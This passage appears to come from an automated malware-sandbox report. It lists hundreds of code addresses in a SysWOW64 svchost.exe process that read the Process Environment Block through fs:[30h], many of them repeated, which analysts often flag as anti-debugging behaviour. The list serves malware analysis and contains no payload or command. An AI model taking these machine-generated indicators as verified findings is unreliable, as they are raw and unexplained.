            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h]1_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h]1_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390634F mov eax, dword ptr fs:[00000030h]1_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D437C mov eax, dword ptr fs:[00000030h]1_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h]1_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382823B mov eax, dword ptr fs:[00000030h]1_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390625D mov eax, dword ptr fs:[00000030h]1_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h]1_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836259 mov eax, dword ptr fs:[00000030h]1_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382826B mov eax, dword ptr fs:[00000030h]1_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03870185 mov eax, dword ptr fs:[00000030h]1_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h]1_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h]1_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h]1_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860124 mov eax, dword ptr fs:[00000030h]1_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]1_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]1_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]1_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h]1_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]1_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]1_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]1_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]1_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]1_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]1_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]1_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]1_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]1_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]1_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]1_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]1_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]1_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]1_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]1_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]1_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]1_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]1_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]1_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]1_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]1_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]1_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]1_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]1_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]1_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]1_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]1_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]1_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]1_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]1_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]1_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]1_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]1_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]1_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]1_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]1_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]1_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]1_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]1_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]1_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
